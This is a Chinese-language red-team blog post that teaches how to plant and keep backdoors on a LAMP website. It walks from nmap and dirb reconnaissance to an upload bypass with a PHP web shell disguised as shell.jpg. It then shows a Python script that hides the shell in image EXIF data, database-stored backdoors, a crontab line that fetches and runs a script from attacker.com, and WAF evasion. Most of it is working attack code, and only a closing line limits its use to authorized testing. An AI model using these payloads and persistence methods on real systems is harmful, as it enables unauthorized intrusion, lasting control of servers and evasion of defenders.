一、为什么后门植入是一门艺术
说到网站后门植入,这是红队任务中一个经典且常见的目标。后门不仅能帮助我们维持对目标环境的长久控制,还能提供便利的横向移动跳板。有一次,我接到一个任务,目标是攻破一家公司的网站后台,并通过植入后门获得持久访问权限。这个目标的Web服务器架构是典型的LAMP(Linux, Apache, MySQL, PHP)栈,后台逻辑复杂且有一定的防御机制。
一般来说,植入后门的关键在于两点:隐蔽性和稳定性。隐蔽性要求后门尽量不被管理员或安全软件发现,而稳定性则保证后门在目标环境中可以长时间正常运行。这篇文章,我将分享在实战中如何攻破目标网站,并结合真实案例,逐步解析植入后门的核心技术。
---
二、目标环境分析与信息收集
后门植入的第一步,永远是信息收集。我们需要对目标网站的运行环境、版本信息、插件、文件结构等有一个全面的了解。以下是我当时针对目标环境所做的分析。
1. Web服务器信息收集
目标网站初步探测表明:
- 服务器类型: Apache 2.4.51
- 编程语言: PHP 7.4
- 数据库: MySQL 5.7
- 操作系统: Ubuntu 20.04
通过简单的curl和nmap扫描,我们得到了开放端口和一些可能的服务版本信息: <pre><code class="language-bash">nmap -sV -Pn -p- target.com
扫描结果显示
80/tcp open http Apache httpd 2.4.51
3306/tcp open mysql MySQL 5.7</code></pre>
2. 文件目录结构侦查
接下来,我用了目录爆破工具dirb来探测目录结构: <pre><code class="language-bash">dirb http://target.com /usr/share/wordlists/dirb/common.txt
报告中发现了一些有趣的路径:
/admin/
/uploads/
/backup/
/api/</code></pre>
重点是/uploads/目录,这通常是文件上传的入口,而文件上传漏洞是植入Web后门的黄金通道。
---
三、文件上传后门植入技术详解
文件上传是后门植入的常见途径之一。有时候目标网站会允许用户上传图片、文档等文件,但上传功能的安全性取决于两点:文件类型校验和代码执行权限。如果我们找到一个漏洞,就可以利用上传的文件植入后门。
1. 绕过文件类型校验
目标网站的上传功能限制只能上传图片文件,但它并没有严格限制文件内容。我通过抓包发现,服务端只是简单地检查文件扩展名,而没有对文件内容进行深度验证。 于是,我构造了一个伪装的PHP后门文件,将后缀改为.jpg: <pre><code class="language-php"><?php // 这是一个简单的PHP后门,用于执行任意命令 if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?></code></pre> 保存文件为shell.jpg,并通过上传功能成功上传。
2. 获取代码执行权限
上传完成后,我尝试访问后门文件: <pre><code>http://target.com/uploads/shell.jpg?cmd=whoami</code></pre> 结果成功返回了www-data,说明后门文件具有代码执行权限。此时,我们已经可以执行服务器命令。
---
四、武器化Payload:隐蔽性优化与免杀技术
在实战中,简单的PHP后门虽然好用,但非常容易被发现。为了提高隐蔽性,我对后门代码进行了优化,并嵌入到网站的正常资源文件中,比如.js文件、图片的EXIF数据或数据库查询逻辑。
1. 隐藏后门到图片EXIF数据
通过EXIF数据嵌入后门代码,可以有效隐藏恶意内容: <pre><code class="language-python">from PIL import Image from PIL.ExifTags import TAGS import piexif
创建图片文件
img = Image.new('RGB', (100, 100), color = (73, 109, 137)) img.save('image.jpg')
嵌入PHP后门代码到EXIF注释字段
exif_dict = piexif.load("image.jpg") exif_dict['0th'][piexif.ExifIFD.UserComment] = b"<?php echo shell_exec($_GET['cmd']); ?>" piexif.insert(piexif.dump(exif_dict), "image.jpg")</code></pre> 上传图片后,只需在代码中读取EXIF注释字段,即可执行后门。
2. 嵌套到正常网站逻辑
有时候网站的某些功能需要动态从数据库读取内容。我们可以将后门代码嵌入到数据库的内容中,比如插入到某个博客文章的字段,然后通过页面渲染时触发代码执行。
---
五、持久化与权限维持
植入后门后,我们需要确保后门不会被轻易删除。以下是一些常见的持久化技巧:
1. 数据库存储后门
将后门代码存储到数据库中,如某个博客文章或用户字段。这样即使文件被删除,后门也可以通过SQL注入再次激活。
2. 定时任务注入
利用crontab添加一个定时任务,让服务器定期执行后门代码: <pre><code class="language-bash">echo " * curl http://attacker.com/shell.php | bash" >> /etc/crontab</code></pre>
---
六、检测与防御的对抗策略
在和目标环境对抗时,我们需要时刻注意可能的检测手段。以下是一些常见绕过技巧:
1. 绕过WAF规则
很多网站会部署Web应用防火墙(WAF)来检测恶意流量。我们可以通过流量混淆绕过规则,比如: <pre><code class="language-bash">curl 'http://target.com/uploads/shell.jpg?cmd=ls' \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \ -H "Referer: http://target.com"</code></pre>
2. 文件名伪装
上传的后门文件可以伪装成图片文件: <pre><code class="language-bash">mv shell.php shell.jpg</code></pre> 也可以通过随机文件名,降低被发现的概率。
---
七、个人总结:后门植入的关键点
在实战中,后门植入技术是攻击者维持权限的核心武器。成功的后门需要具备以下特点:
- 高度隐蔽:不仅要绕过管理员的肉眼检查,还需要规避安全软件的检测;
- 稳定可靠:后门代码不能因为环境变化而失效;
- 操作灵活:最好支持远程执行命令、文件操作等功能。
通过本文,你应该能学到如何从信息收集到后门植入,再到持久化控制的完整攻击链。当然,请记住,这些技术仅限于授权的合法测试,不得用于非法用途。